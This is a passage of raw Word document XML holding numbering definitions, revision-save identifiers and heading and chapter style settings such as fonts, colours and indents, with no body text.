    <w:lvl w:ilvl="0" w:tplc="62A02C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573377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7300461E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Chapter"/>
      <w:lvlText w:val="Chapter %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>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347F1A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB783CBA"/>
    <w:lvl w:ilvl="0" w:tplc="DBF4B40C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"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7F1CA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC8CCB14"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="Chapter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35194AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF20E64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8074C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="834C8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4F7DBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B8886A4"/>
    <w:lvl w:ilvl="0" w:tplc="0F9C4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26B14AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51860532"/>
    <w:lvl w:ilvl="0" w:tplc="AF944D52">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B93A15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="785A90AA"/>
    <w:lvl w:ilvl="0" w:tplc="97948EAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"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0A6202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4C09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91239A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E8624E0"/>
    <w:lvl w:ilvl="0" w:tplc="2D627B0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816235"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B862078"/>
    <w:lvl w:ilvl="0" w:tplc="B2562A1E">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21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6BAB4C28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D87A4A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4D69DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E967E6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0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>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num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="5"/>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grammar="clean"/>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388"/>
    <w:rsid w:val="00003BB7"/>
    <w:rsid w:val="00006825"/>
    <w:rsid w:val="00010AEF"/>
    <w:rsid w:val="00023C3A"/>
    <w:rsid w:val="00026B5A"/>
    <w:rsid w:val="00030F92"/>
    <w:rsid w:val="00047AC7"/>
    <w:rsid w:val="00050E57"/>
    <w:rsid w:val="00054518"/>
    <w:rsid w:val="0005763A"/>
    <w:rsid w:val="0006024B"/>
    <w:rsid w:val="00062D79"/>
    <w:rsid w:val="00063A1C"/>
    <w:rsid w:val="00063F47"/>
    <w:rsid w:val="00064EB7"/>
    <w:rsid w:val="000679BF"/>
    <w:rsid w:val="00067ED0"/>
    <w:rsid w:val="00087128"/>
    <w:rsid w:val="00094EB9"/>
    <w:rsid w:val="00095BB2"/>
    <w:rsid w:val="000A3225"/>
    <w:rsid w:val="000A4306"/>
    <w:rsid w:val="000A48F6"/>
    <w:rsid w:val="000A77FD"/>
    <w:rsid w:val="000A7B42"/>
    <w:rsid w:val="000B0473"/>
    <w:rsid w:val="000B5278"/>
    <w:rsid w:val="000B5B0F"/>
    <w:rsid w:val="000B664D"/>
    <w:rsid w:val="000B77BF"/>
    <w:rsid w:val="000C0B89"/>
    <w:rsid w:val="000C11BF"/>
    <w:rsid w:val="000D022A"/>
    <w:rsid w:val="000D4E08"/>
    <w:rsid w:val="000F39ED"/>
    <w:rsid w:val="000F6B4C"/>
    <w:rsid w:val="00126710"/>
    <w:rsid w:val="00130837"/>
    <w:rsid w:val="00130C5A"/>
    <w:rsid w:val="00131B99"/>
    <w:rsid w:val="00133620"/>
    <w:rsid w:val="00134A20"/>
    <w:rsid w:val="00134A41"/>
    <w:rsid w:val="00135336"/>
    <w:rsid w:val="00137AE0"/>
    <w:rsid w:val="001417F4"/>
    <w:rsid w:val="001425DB"/>
    <w:rsid w:val="00152570"/>
    <w:rsid w:val="001541BB"/>
    <w:rsid w:val="001561F9"/>
    <w:rsid w:val="00156C89"/>
    <w:rsid w:val="001670A1"/>
    <w:rsid w:val="00173F3F"/>
    <w:rsid w:val="00177021"/>
    <w:rsid w:val="001858EF"/>
    <w:rsid w:val="00196A18"/>
    <w:rsid w:val="001A6FED"/>
    <w:rsid w:val="001B297E"/>
    <w:rsid w:val="001B6B58"/>
    <w:rsid w:val="001C2E70"/>
    <w:rsid w:val="001C670A"/>
    <w:rsid w:val="001D0746"/>
    <w:rsid w:val="001D11AB"/>
    <w:rsid w:val="001D2799"/>
    <w:rsid w:val="001E6C8C"/>
    <w:rsid w:val="001E7337"/>
    <w:rsid w:val="00200338"/>
    <w:rsid w:val="00202D03"/>
    <w:rsid w:val="002052C4"/>
    <w:rsid w:val="00211D26"/>
    <w:rsid w:val="00215BF8"/>
    <w:rsid w:val="00232F6A"/>
    <w:rsid w:val="00235F8C"/>
    <w:rsid w:val="00245C09"/>
    <w:rsid w:val="00245FA6"/>
    <w:rsid w:val="00247427"/>
    <w:rsid w:val="002558B0"/>
    <w:rsid w:val="002565A7"/>
    <w:rsid w:val="00260563"/>
    <w:rsid w:val="00266A24"/>
    <w:rsid w:val="002723A5"/>
    <w:rsid w:val="00280207"/>
    <w:rsid w:val="00281521"/>
    <w:rsid w:val="00284E83"/>
    <w:rsid w:val="00287BCD"/>
    <w:rsid w:val="00290AB6"/>
    <w:rsid w:val="002935B6"/>
    <w:rsid w:val="002A12C8"/>
    <w:rsid w:val="002B5F3A"/>
    <w:rsid w:val="002B600A"/>
    <w:rsid w:val="002B7458"/>
    <w:rsid w:val="002B7F94"/>
    <w:rsid w:val="002C2B3F"/>
    <w:rsid w:val="002C43F1"/>
    <w:rsid w:val="002D0BB9"/>
    <w:rsid w:val="002D356E"/>
    <w:rsid w:val="002F6C96"/>
    <w:rsid w:val="003024F5"/>
    <w:rsid w:val="003043ED"/>
    <w:rsid w:val="00311405"/>
    <w:rsid w:val="0031291A"/>
    <w:rsid w:val="003137A0"/>
    <w:rsid w:val="0031433A"/>
    <w:rsid w:val="0031762B"/>
    <w:rsid w:val="00320ED1"/>
    <w:rsid w:val="0032487F"/>
    <w:rsid w:val="00325366"/>
    <w:rsid w:val="00325EC6"/>
    <w:rsid w:val="0033002B"/>
    <w:rsid w:val="003328A2"/>
    <w:rsid w:val="0033426A"/>
    <w:rsid w:val="003371FE"/>
    <w:rsid w:val="0034161F"/>
    <w:rsid w:val="00345B0F"/>
    <w:rsid w:val="00350C9B"/>
    <w:rsid w:val="003527B4"/>
    <w:rsid w:val="00362FBB"/>
    <w:rsid w:val="00364852"/>
    <w:rsid w:val="00364F5C"/>
    <w:rsid w:val="003712A1"/>
    <w:rsid w:val="003725C1"/>
    <w:rsid w:val="0037653E"/>
    <w:rsid w:val="003802AB"/>
    <w:rsid w:val="003813AA"/>
    <w:rsid w:val="003813E4"/>
    <w:rsid w:val="00387B49"/>
    <w:rsid w:val="00390127"/>
    <w:rsid w:val="0039660C"/>
    <w:rsid w:val="003A23CE"/>
    <w:rsid w:val="003A6E7F"/>
    <w:rsid w:val="003A6EDB"/>
    <w:rsid w:val="003B1B5E"/>
    <w:rsid w:val="003B53B6"/>
    <w:rsid w:val="003B77C9"/>
    <w:rsid w:val="003C1ED4"/>
    <w:rsid w:val="003C3159"/>
    <w:rsid w:val="003C365B"/>
    <w:rsid w:val="003D183A"/>
    <w:rsid w:val="003D5563"/>
    <w:rsid w:val="003E0366"/>
    <w:rsid w:val="003E2A6F"/>
    <w:rsid w:val="003F21BB"/>
    <w:rsid w:val="003F301F"/>
    <w:rsid w:val="003F590C"/>
    <w:rsid w:val="00401671"/>
    <w:rsid w:val="00406E91"/>
    <w:rsid w:val="00407D41"/>
    <w:rsid w:val="004113CB"/>
    <w:rsid w:val="0042288E"/>
    <w:rsid w:val="00430F22"/>
    <w:rsid w:val="004534AE"/>
    <w:rsid w:val="00457C49"/>
    <w:rsid w:val="00466561"/>
    <w:rsid w:val="0047170D"/>
    <w:rsid w:val="0047771F"/>
    <w:rsid w:val="0048196B"/>
    <w:rsid w:val="004827A8"/>
    <w:rsid w:val="004829A7"/>
    <w:rsid w:val="00495982"/>
    <w:rsid w:val="004A1113"/>
    <w:rsid w:val="004A4D8F"/>
    <w:rsid w:val="004A69C8"/>
    <w:rsid w:val="004B0379"/>
    <w:rsid w:val="004B1D3D"/>
    <w:rsid w:val="004C3F6D"/>
    <w:rsid w:val="004C6026"/>
    <w:rsid w:val="004C6A4E"/>
    <w:rsid w:val="004D192C"/>
    <w:rsid w:val="004D43D6"/>
    <w:rsid w:val="004E0912"/>
    <w:rsid w:val="004E2049"/>
    <w:rsid w:val="00503832"/>
    <w:rsid w:val="0051408A"/>
    <w:rsid w:val="00514FF3"/>
    <w:rsid w:val="005250D5"/>
    <w:rsid w:val="00525B3D"/>
    <w:rsid w:val="00526388"/>
    <w:rsid w:val="00541694"/>
    <w:rsid w:val="00546E51"/>
    <w:rsid w:val="0055127B"/>
    <w:rsid w:val="00562238"/>
    <w:rsid w:val="00576CC6"/>
    <w:rsid w:val="00577F94"/>
    <w:rsid w:val="00580A9D"/>
    <w:rsid w:val="00581DDE"/>
    <w:rsid w:val="00584149"/>
    <w:rsid w:val="00592005"/>
    <w:rsid w:val="00594D87"/>
    <w:rsid w:val="005A10E7"/>
    <w:rsid w:val="005A1547"/>
    <w:rsid w:val="005A5C0D"/>
    <w:rsid w:val="005B1D4D"/>
    <w:rsid w:val="005C05B7"/>
    <w:rsid w:val="005C4649"/>
    <w:rsid w:val="005C4E19"/>
    <w:rsid w:val="005C5F8C"/>
    <w:rsid w:val="005C63B5"/>
    <w:rsid w:val="00600BA7"/>
    <w:rsid w:val="00602CF8"/>
    <w:rsid w:val="00604388"/>
    <w:rsid w:val="00620473"/>
    <w:rsid w:val="00621518"/>
    <w:rsid w:val="006235EF"/>
    <w:rsid w:val="00630EC7"/>
    <w:rsid w:val="006565FE"/>
    <w:rsid w:val="00672188"/>
    <w:rsid w:val="00680540"/>
    <w:rsid w:val="006867D5"/>
    <w:rsid w:val="006A2017"/>
    <w:rsid w:val="006A21F8"/>
    <w:rsid w:val="006A30E1"/>
    <w:rsid w:val="006A3B63"/>
    <w:rsid w:val="006A5361"/>
    <w:rsid w:val="006A6051"/>
    <w:rsid w:val="006B6E8A"/>
    <w:rsid w:val="006D2D3D"/>
    <w:rsid w:val="006F1CBF"/>
    <w:rsid w:val="007074B2"/>
    <w:rsid w:val="0072132A"/>
    <w:rsid w:val="007235C2"/>
    <w:rsid w:val="00730D2E"/>
    <w:rsid w:val="00743CCD"/>
    <w:rsid w:val="0074553E"/>
    <w:rsid w:val="00754DC7"/>
    <w:rsid w:val="007634B2"/>
    <w:rsid w:val="00763FEA"/>
    <w:rsid w:val="007644D7"/>
    <w:rsid w:val="0076640B"/>
    <w:rsid w:val="00782346"/>
    <w:rsid w:val="00790A80"/>
    <w:rsid w:val="00790F27"/>
    <w:rsid w:val="0079537F"/>
    <w:rsid w:val="007A6F8C"/>
    <w:rsid w:val="007B5D92"/>
    <w:rsid w:val="007C596B"/>
    <w:rsid w:val="007C5A92"/>
    <w:rsid w:val="007D073C"/>
    <w:rsid w:val="007D1D38"/>
    <w:rsid w:val="007D4BC6"/>
    <w:rsid w:val="007D52D3"/>
    <w:rsid w:val="007D6443"/>
    <w:rsid w:val="007E3DD2"/>
    <w:rsid w:val="007E611D"/>
    <w:rsid w:val="007E68F2"/>
    <w:rsid w:val="00803051"/>
    <w:rsid w:val="00811A53"/>
    <w:rsid w:val="008173F2"/>
    <w:rsid w:val="0082423F"/>
    <w:rsid w:val="00830CDC"/>
    <w:rsid w:val="00841223"/>
    <w:rsid w:val="00845030"/>
    <w:rsid w:val="00850E34"/>
    <w:rsid w:val="0085113D"/>
    <w:rsid w:val="008625D0"/>
    <w:rsid w:val="00865126"/>
    <w:rsid w:val="00865A00"/>
    <w:rsid w:val="008668F2"/>
    <w:rsid w:val="00872321"/>
    <w:rsid w:val="00877325"/>
    <w:rsid w:val="008847F5"/>
    <w:rsid w:val="00894091"/>
    <w:rsid w:val="00896C1B"/>
    <w:rsid w:val="008A23FC"/>
    <w:rsid w:val="008B23B2"/>
    <w:rsid w:val="008B4B82"/>
    <w:rsid w:val="008B60E4"/>
    <w:rsid w:val="008B6D53"/>
    <w:rsid w:val="008C06C7"/>
    <w:rsid w:val="008C5799"/>
    <w:rsid w:val="008C5BAA"/>
    <w:rsid w:val="008D132E"/>
    <w:rsid w:val="008D3B35"/>
    <w:rsid w:val="008E4183"/>
    <w:rsid w:val="008F0F14"/>
    <w:rsid w:val="008F4BF7"/>
    <w:rsid w:val="00901234"/>
    <w:rsid w:val="00901910"/>
    <w:rsid w:val="00904D1E"/>
    <w:rsid w:val="009067EA"/>
    <w:rsid w:val="00910021"/>
    <w:rsid w:val="00910D7B"/>
    <w:rsid w:val="00914C39"/>
    <w:rsid w:val="00927DA6"/>
    <w:rsid w:val="0093414E"/>
    <w:rsid w:val="00944C64"/>
    <w:rsid w:val="00955443"/>
    <w:rsid w:val="00964D71"/>
    <w:rsid w:val="009676F8"/>
    <w:rsid w:val="009729D4"/>
    <w:rsid w:val="00976DC2"/>
    <w:rsid w:val="009862B5"/>
    <w:rsid w:val="00990FA2"/>
    <w:rsid w:val="00993912"/>
    <w:rsid w:val="00994A2F"/>
    <w:rsid w:val="00994B42"/>
    <w:rsid w:val="009A1B99"/>
    <w:rsid w:val="009A2690"/>
    <w:rsid w:val="009A5E7D"/>
    <w:rsid w:val="009B04F7"/>
    <w:rsid w:val="009B2BE7"/>
    <w:rsid w:val="009C38F0"/>
    <w:rsid w:val="009D33EA"/>
    <w:rsid w:val="009D36EB"/>
    <w:rsid w:val="009D4270"/>
    <w:rsid w:val="009F29DA"/>
    <w:rsid w:val="009F4123"/>
    <w:rsid w:val="00A03AA4"/>
    <w:rsid w:val="00A067CE"/>
    <w:rsid w:val="00A1554A"/>
    <w:rsid w:val="00A240EA"/>
    <w:rsid w:val="00A2470A"/>
    <w:rsid w:val="00A3196D"/>
    <w:rsid w:val="00A432FD"/>
    <w:rsid w:val="00A44E12"/>
    <w:rsid w:val="00A45170"/>
    <w:rsid w:val="00A51D11"/>
    <w:rsid w:val="00A53CB7"/>
    <w:rsid w:val="00A738C2"/>
    <w:rsid w:val="00A753E4"/>
    <w:rsid w:val="00A81747"/>
    <w:rsid w:val="00A8226C"/>
    <w:rsid w:val="00A90303"/>
    <w:rsid w:val="00A94909"/>
    <w:rsid w:val="00A94DD6"/>
    <w:rsid w:val="00A95E8E"/>
    <w:rsid w:val="00AA7BD6"/>
    <w:rsid w:val="00AB2F74"/>
    <w:rsid w:val="00AC114D"/>
    <w:rsid w:val="00AC1E06"/>
    <w:rsid w:val="00AC6309"/>
    <w:rsid w:val="00AC6729"/>
    <w:rsid w:val="00AD10D8"/>
    <w:rsid w:val="00AE0062"/>
    <w:rsid w:val="00AE511C"/>
    <w:rsid w:val="00AE6875"/>
    <w:rsid w:val="00AF24DE"/>
    <w:rsid w:val="00AF4962"/>
    <w:rsid w:val="00AF4EA3"/>
    <w:rsid w:val="00AF58DA"/>
    <w:rsid w:val="00AF7236"/>
    <w:rsid w:val="00B02E5E"/>
    <w:rsid w:val="00B0640C"/>
    <w:rsid w:val="00B17C91"/>
    <w:rsid w:val="00B23BE4"/>
    <w:rsid w:val="00B37AF9"/>
    <w:rsid w:val="00B41F3B"/>
    <w:rsid w:val="00B42A19"/>
    <w:rsid w:val="00B46827"/>
    <w:rsid w:val="00B71863"/>
    <w:rsid w:val="00B728B7"/>
    <w:rsid w:val="00B77A88"/>
    <w:rsid w:val="00B8041C"/>
    <w:rsid w:val="00B81AF2"/>
    <w:rsid w:val="00B82687"/>
    <w:rsid w:val="00B9013B"/>
    <w:rsid w:val="00B91AB3"/>
    <w:rsid w:val="00BA1B83"/>
    <w:rsid w:val="00BA1DEF"/>
    <w:rsid w:val="00BA32A4"/>
    <w:rsid w:val="00BA60B3"/>
    <w:rsid w:val="00BB1F1C"/>
    <w:rsid w:val="00BB3774"/>
    <w:rsid w:val="00BC159D"/>
    <w:rsid w:val="00BC587C"/>
    <w:rsid w:val="00BD03D9"/>
    <w:rsid w:val="00BD3EE8"/>
    <w:rsid w:val="00BE402E"/>
    <w:rsid w:val="00BE47BE"/>
    <w:rsid w:val="00BE5065"/>
    <w:rsid w:val="00BF4742"/>
    <w:rsid w:val="00C00E3F"/>
    <w:rsid w:val="00C0486E"/>
    <w:rsid w:val="00C111F5"/>
    <w:rsid w:val="00C21216"/>
    <w:rsid w:val="00C258C6"/>
    <w:rsid w:val="00C27956"/>
    <w:rsid w:val="00C352B0"/>
    <w:rsid w:val="00C40A43"/>
    <w:rsid w:val="00C425FC"/>
    <w:rsid w:val="00C437AB"/>
    <w:rsid w:val="00C44A6F"/>
    <w:rsid w:val="00C45442"/>
    <w:rsid w:val="00C500CD"/>
    <w:rsid w:val="00C51A1A"/>
    <w:rsid w:val="00C525C7"/>
    <w:rsid w:val="00C56305"/>
    <w:rsid w:val="00C60196"/>
    <w:rsid w:val="00C62525"/>
    <w:rsid w:val="00C63970"/>
    <w:rsid w:val="00C66A05"/>
    <w:rsid w:val="00C73690"/>
    <w:rsid w:val="00C92C7D"/>
    <w:rsid w:val="00C93DB6"/>
    <w:rsid w:val="00C9424D"/>
    <w:rsid w:val="00CA1AEF"/>
    <w:rsid w:val="00CA6920"/>
    <w:rsid w:val="00CB3FAC"/>
    <w:rsid w:val="00CC0C0B"/>
    <w:rsid w:val="00CD4CB3"/>
    <w:rsid w:val="00CD556F"/>
    <w:rsid w:val="00CE7B77"/>
    <w:rsid w:val="00CF077E"/>
    <w:rsid w:val="00CF1493"/>
    <w:rsid w:val="00CF22DD"/>
    <w:rsid w:val="00D01F87"/>
    <w:rsid w:val="00D03D21"/>
    <w:rsid w:val="00D11EE7"/>
    <w:rsid w:val="00D11FED"/>
    <w:rsid w:val="00D14275"/>
    <w:rsid w:val="00D15150"/>
    <w:rsid w:val="00D17E2A"/>
    <w:rsid w:val="00D17EE5"/>
    <w:rsid w:val="00D22AC8"/>
    <w:rsid w:val="00D26AF5"/>
    <w:rsid w:val="00D26C9E"/>
    <w:rsid w:val="00D30FE1"/>
    <w:rsid w:val="00D32649"/>
    <w:rsid w:val="00D32ED3"/>
    <w:rsid w:val="00D370AF"/>
    <w:rsid w:val="00D42607"/>
    <w:rsid w:val="00D42C86"/>
    <w:rsid w:val="00D5205D"/>
    <w:rsid w:val="00D56635"/>
    <w:rsid w:val="00D72550"/>
    <w:rsid w:val="00D7500C"/>
    <w:rsid w:val="00D8127C"/>
    <w:rsid w:val="00D907E1"/>
    <w:rsid w:val="00D90AA0"/>
    <w:rsid w:val="00D92C26"/>
    <w:rsid w:val="00D92F46"/>
    <w:rsid w:val="00D94BDA"/>
    <w:rsid w:val="00DA04E1"/>
    <w:rsid w:val="00DB15A5"/>
    <w:rsid w:val="00DB2D4C"/>
    <w:rsid w:val="00DB49AE"/>
    <w:rsid w:val="00DC3F5C"/>
    <w:rsid w:val="00DC60B1"/>
    <w:rsid w:val="00DC7DDE"/>
    <w:rsid w:val="00DD628B"/>
    <w:rsid w:val="00DE0682"/>
    <w:rsid w:val="00DF08E2"/>
    <w:rsid w:val="00DF6B0B"/>
    <w:rsid w:val="00E05464"/>
    <w:rsid w:val="00E2646F"/>
    <w:rsid w:val="00E26D9F"/>
    <w:rsid w:val="00E31F6B"/>
    <w:rsid w:val="00E364D7"/>
    <w:rsid w:val="00E41963"/>
    <w:rsid w:val="00E445CE"/>
    <w:rsid w:val="00E44D34"/>
    <w:rsid w:val="00E53574"/>
    <w:rsid w:val="00E53CB7"/>
    <w:rsid w:val="00E646DE"/>
    <w:rsid w:val="00E672A8"/>
    <w:rsid w:val="00E7062B"/>
    <w:rsid w:val="00E73A17"/>
    <w:rsid w:val="00E73C40"/>
    <w:rsid w:val="00E76CFF"/>
    <w:rsid w:val="00E819FF"/>
    <w:rsid w:val="00E90A36"/>
    <w:rsid w:val="00EA2934"/>
    <w:rsid w:val="00EA3EC9"/>
    <w:rsid w:val="00EA4E51"/>
    <w:rsid w:val="00EA71C0"/>
    <w:rsid w:val="00EA77C6"/>
    <w:rsid w:val="00EB4378"/>
    <w:rsid w:val="00EC1DDA"/>
    <w:rsid w:val="00ED091A"/>
    <w:rsid w:val="00ED26F5"/>
    <w:rsid w:val="00EE0D90"/>
    <w:rsid w:val="00EE76F2"/>
    <w:rsid w:val="00EF2B8A"/>
    <w:rsid w:val="00EF58FF"/>
    <w:rsid w:val="00F05F19"/>
    <w:rsid w:val="00F06FEA"/>
    <w:rsid w:val="00F102F2"/>
    <w:rsid w:val="00F10476"/>
    <w:rsid w:val="00F11BB5"/>
    <w:rsid w:val="00F17DB1"/>
    <w:rsid w:val="00F216DD"/>
    <w:rsid w:val="00F30840"/>
    <w:rsid w:val="00F33A57"/>
    <w:rsid w:val="00F33E00"/>
    <w:rsid w:val="00F41346"/>
    <w:rsid w:val="00F4418A"/>
    <w:rsid w:val="00F73B87"/>
    <w:rsid w:val="00F73C0C"/>
    <w:rsid w:val="00F77A4C"/>
    <w:rsid w:val="00F77C71"/>
    <w:rsid w:val="00F85F5E"/>
    <w:rsid w:val="00F9318A"/>
    <w:rsid w:val="00F95A3B"/>
    <w:rsid w:val="00F9659F"/>
    <w:rsid w:val="00FA24D9"/>
    <w:rsid w:val="00FA2604"/>
    <w:rsid w:val="00FA40B2"/>
    <w:rsid w:val="00FA5535"/>
    <w:rsid w:val="00FB1472"/>
    <w:rsid w:val="00FB2DC8"/>
    <w:rsid w:val="00FB2F32"/>
    <w:rsid w:val="00FB3953"/>
    <w:rsid w:val="00FB778B"/>
    <w:rsid w:val="00FC0348"/>
    <w:rsid w:val="00FC0C30"/>
    <w:rsid w:val="00FC1E10"/>
    <w:rsid w:val="00FD1ED1"/>
    <w:rsid w:val="00FE4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35E91A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FBD0EA6A-7894-42B2-82C0-35BBF376F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line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>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26388"/>
    <w:pPr>
      <w:spacing w:after="122" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E90A36"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BB1F1C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0" w:line="360" w:lineRule="auto"/>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D94BDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="18"/>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94BDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1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437AB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1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4BDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1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4BDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1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4BDA"/>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4BDA"/>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Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="ChapterChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E445CE"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ChapterChar">
    <w:name w:val="Chapter Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Chapter"/>
    <w:rsid w:val="00E445CE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E90A36"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BB1F1C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:szCs w:val="26"/>
